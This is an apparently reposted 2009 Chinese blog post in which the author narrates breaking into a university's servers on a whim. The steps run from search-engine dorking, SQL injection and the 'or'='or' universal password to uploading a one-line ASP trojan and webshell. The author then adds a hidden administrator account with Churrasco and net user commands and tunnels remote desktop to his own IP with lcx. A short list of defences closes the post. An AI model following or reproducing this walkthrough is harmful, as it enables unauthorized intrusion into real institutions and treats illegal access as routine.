您的位置：首页 > 其它

平安夜对某大学的一次安全检测

2009-02-19 09:32 295 查看

平安夜对某大学的一次安全检测
安天365团队原创
题记：在网络的安全性方面，中国的大学网站这一特殊网络群体被视为弱势群体，被众多安全爱好者做为网络安全检测的首选目标。
在所谓的平安夜，我百无聊赖，突然收到某大学同学发来的祝福短信，于是萌生了对其所在大学做一次安全检测的想法。下面是进行安全检测的整个过程。
大学的网站的脆弱性就在与它是由主站和很多各院分站构成的。每一个分站都由不同的管理员进行配置和管理，这就大大增加了整个网站系统的脆弱性。
1.使用百度搜索注入点
首先我利用百度对这所大学批量找了一下注入点。在百度中以inurl:asp? site:***.edu.cn为关键字进行搜索。然后把搜索得到的网址放到注入工具阿D里进行自动搜索注入点，不一会的功夫就找到很多注入点，如图1所示，初步判断这些网站的安全性为弱。

下载 (112.77 KB)

2 分钟前
图1通过百度搜索学校注入点
2.整理搜索结果
将所有的注入点进行分类整理，把不同院系的注入点分开，这样就避免对一个院系检测未果之后，在其它本系的注入点上浪费时间，以提高检测效率。
3.对注入点猜解账号密码
对整理的注入点使用注入工具阿D猜解表中的用户账号密码。通过猜解我发现，很多大学院系的管理员密码并非用md5进行加密，这样就阻止了我猜解密码进后台的想法。可是当我猜解某一个系的管理员账号的时候，竟然发现有一个管理员账号是<%execute request(“cmd”)%>,说明该网站已经被人入侵了，如图2所示。可是我并没有猜出管理员密码的字段，那之前的人是怎么进去的呢？我自然想到了万能密码，于是用阿D猜出后台地址，输入万能密码’or’=’or’，果真顺利进入后台。

下载 (78.26 KB)

2 分钟前
图2获取入侵者插入的shell
4.分析后台并寻找提升权限处
不过进入后台后却发现后台过于简陋，连个上传的地方没有，后台插马也不可能。在仔细分析失败后，最终放弃这个后台。经过一个多小时的注入分析，发现现在各院的管理员密码基本都不是md5方式加密，那得到管理员账号和密码进后台的这条思路断了。不过我想我们还可以利用阿D的后台猜解功能猜解后台，然后尝试用万能密码登录。并且在找后台的时候注意一些其他的敏感链接，比如upfile.asp之类的上传链接，可能就是突破点。
通过尝试，终于以万能密码进入几个后台，不过后台都很简陋，根本拿不了webshell，这让我很郁闷。同时我也注意阿D猜解出来的敏感路径，却始终没有发现上传之类的链接。于是我开始静下心来一个链接一个链接的找后台，试万能密码，可毕竟用万能密码能进的是少数，能进的后台又都超级简陋，让我很是郁闷。突然阿D列出这样一个链接http://office.*****.edu.cn/adduser.asp,我试着访问了一下。竟然看到了如图3所示的界面，也就是说这个界面没加session进行验证。

下载 (28.72 KB)

2 分钟前
图3获取未加session验证的管理页面
本以为老天赐我一个成功的机会，赶紧加个用户，点“确定”后，却还是跳掉了登陆界面，让我的热情凉了一半。
弄了一个多小时，连个webshell都没拿，就这么放弃吗？要是放弃了就永远不会成功。那我告诉自己静下心来想想：用表面上万能密码能进的后台肯定很简陋的，因为程序开发者根本没在上面费心思。可是那些功能多点的又进不去。那现在我们换Google，因为阿D能找到的后台地址是有限的，那现在我来批量搜搜这个大学的后台，看能不能找到一些隐蔽的后台可以让我们利用。
5.通过Google搜索后台
以关键词inurl:login site: *****.edu.cn 为关键词进行搜搜，结果搜索出很多后台，如图4所示。还是体力话，一个一个试。

下载 (50.65 KB)

2 分钟前
图4通过Google搜索后台
当打开第二个链接的时候，发现这是一个前台没有链接的后台地址，我想如果不是借助搜索引擎，别人不可能找到。那打开该地址看看，是一个什么办公平台，好像很正规的样子，要是能进去可能有希望，如图5所示。

下载 (52.97 KB)

2 分钟前
图5打开某学校的综合信息管理系统
那我输入万能密码，果真顺利的进去了！真是皇天不负有心人。不知道怎么的，我用IE打不开，所以我用的火狐打开的，是一个新闻发布系统，如图6所示。

下载 (150.85 KB)

2 分钟前
图6打开新闻发表系统
6. 上传并执行一句话木马
发现可以添加图片，上面说明只可以添加jpg和gif的图片，可是我试着上传一个一句话木马，竟然传上去了，晕。我想管理员一定觉得这个后台很隐蔽就过与信任自己了，没有想到我们可以借助搜索引擎才挖掘出来，窃喜中。按照上传的路径成功访问一句话木马，如图7所示。

下载 (22.36 KB)

2 分钟前
图7上传并执行一句话木马
然后就好办了，用一句话连接端连一下，上传一个webshell，这样一个webshell就到手了，如图8.真是踏破铁鞋无觅处，得来全不费工夫，用一线希望换来一片光明。那现在我就静下心来看看可不可以提升一下权限。

下载 (13.16 KB)

2 分钟前
图8得到webshell
7.提升权限
发现这台服务器的权限设置的很不好，大部分目录都可以浏览，而且很多可以写入。看看都支持哪些组件，发现支持wscript，也就是可以执行命令。首先我在C盘发现了Serv-U如图9所示。

下载 (12.55 KB)

2 分钟前
如图9找到Serv-U
尝试用webshell自带的提权程序进行提权，在用webshell带的帐户查看功能查看帐户，发现帐户没加上，大概默认帐户改了。然后打开Serv-U目录下的ServUDaemon.ini文件尝试修改，提示没有权限，如图10所示。

下载 (17.78 KB)

2 分钟前
图10提升权限失败
8.获取端口开放信息
这里我犯了个细节的错误，应该先看看都开了哪些端口就对了。因为接着我扫描常见的端口，发现43958端口就没开，如图11。所以为了提高效率，以后要注意流程问题。

下载 (62.49 KB)

2 分钟前
图11扫描端口
9．执行命令
现在Serv-U没什么戏了。看到3389开了，连接一下提示失败，可能是内网的。现在尝试在webshell上执行命令，发现提示拒绝访问，如图12所示，说明没有对cmd的使用权限。

下载 (26.24 KB)

2 分钟前
图12执行命令
10.上传cmd.exe后成功执行命令
那我们自己上传一个cmd到网站根目录，然后在执行“ipconfig”命令，发现竟然可以了执行，如图13所示，果然是内部网络。

下载 (22.03 KB)

2 分钟前
图13获取网络情况
11.再次提权
那现在我们只要想办法加个管理员级别的用户，然后用lcx把3389端口转出来连接，就可以解决内网3389的问题了。可是我该怎么加用户呢？用刚才的cmd明显权限是不够的，我尝试往启动项里写入bat文件，结果就是没有权限。
接着我开始浏览网站的目录，才发现这个站的主站是aspx的，我想既然支持aspx，我们可以上传一个aspx的大马，这样权限可能会大些。我又突然一想，有没有更简单的办法呢？对，我为什么不尝试一下用MS Windows Token Kidnapping本地提权呢？这个漏洞虽然出来一段时间了，可是貌似没有引起足够重视，如果系统没有打补丁，那就有戏了。
Ps: 这个漏洞是由于在NetworkService 或者 LocalService 下运行的代码，可以访问同样是在 NetworkService 或者 LocalService 下运行的进程，某些进程允许提升权限为LocalSystem。
对于IIS，默认安装是不受影响的，受影响的是你的ASP.NET代码是以 Full Trust 运行，如果权限低于 Full Trust，也不会受影响。老的Asp 代码不受影响，只有 ASP.NET才受影响。对于 SQL Server，如果用户以 administrative 权限运行代码，则会受影响　　对于Windows Server 2003，攻击者可以通过MSDTC获取token访问其他同样token的进程，从而可能造成提权。任何具有SeImpersonatePrivilege的进程都有可能造成提权。对于服务器管理员来说，做一些简单的调整可以在IIS上对抗此威胁。
首先上传一个相关提权工具Churrasco.exe到服务器上，也不知道为什么现在的大多数杀毒软件对这个提权工具都不查杀，很是奇怪。然后用webshell执行命令D:\jingguan\oa\adrot\0day.exe “net user layne$ 871104 /add”（0day.exe为我上传的Churrasco.exe）,然后执行，如图14所示，表明执行成功了！看来运气不错。

图14执行添加用户成功
然后执行命令D:\jingguan\oa\adrot\0day.exe “net localgroup administrators layne$ /add”,再次执行成功，添加用户“layne$”到管理员组，如图15所示。

下载 (112.01 KB)

2 分钟前
图15添加用户“layne$”到管理员组
这样再用webshell的账号查看功能看看都有哪些账户了，果然我的账户layne$被加了进去，成功，如图16所示。

下载 (32.52 KB)

2 分钟前
图16添加用户成功
12．使用lcx转发端口
管理员组的账户layne$已经加了，那现在我们上传一个免杀的lcx到服务器，在本地把我路由的1987端口映射到我自己的计算机上，然后用lcx在本地监听1987端口，命令为lcx –listen 1987 110 ,然后再服务器上用webshell执行“D:\jingguan3\jingguan\lcx.exe –slave 116.217.***.** 1987 127.0.0.1 3389”，等待一会，本地监听成功，如图17所示。

图17使用lcx转发3389端口
13.成功进入远程桌面管理
好了，现在1987端口已经监听成功，现在连接本地110端口，输入我的账号和密码，登录成功，如图18所示。

下载 (38.07 KB)

2 分钟前
图18成功进入远程桌面管理
14.总结
这次检测的整个流程是：在对注入和一般后台进行猜解，猜解失败后，利用google强大的搜索引擎功能搜索出一个隐蔽的管理后台，并用万能密码进入得到webshell，然后利用MS Windows Token Kidnapping成功提权，最后利用lcx的端口转发功能成功登录对方服务器。
防范措施
（1）网站的服务器首先应该派专职技术人员定向管理，而这正是中国大学网站最为不重视的地方。试想一个并不精通相关技术的人员怎么能管理好自己的服务器？
（2）无论是有多少分站一定要统一管理，否则人各管一站，松散如诸侯列国，肯定会出漏洞。
（3）及时关注微软最新漏洞，并打好相关补丁，严格设置服务器目录权限。

图1.JPG (100.59 KB)

下载次数:0
2 分钟前

图16.JPG (69.94 KB)

下载次数:0
2 分钟前

本文出自 “simeon技术专栏” 博客，转载请与作者联系！

内容来自用户分享和网络整理，不保证内容的准确性，如有侵权内容，可联系管理员处理

标签：

相关文章推荐

新的分享

章节导航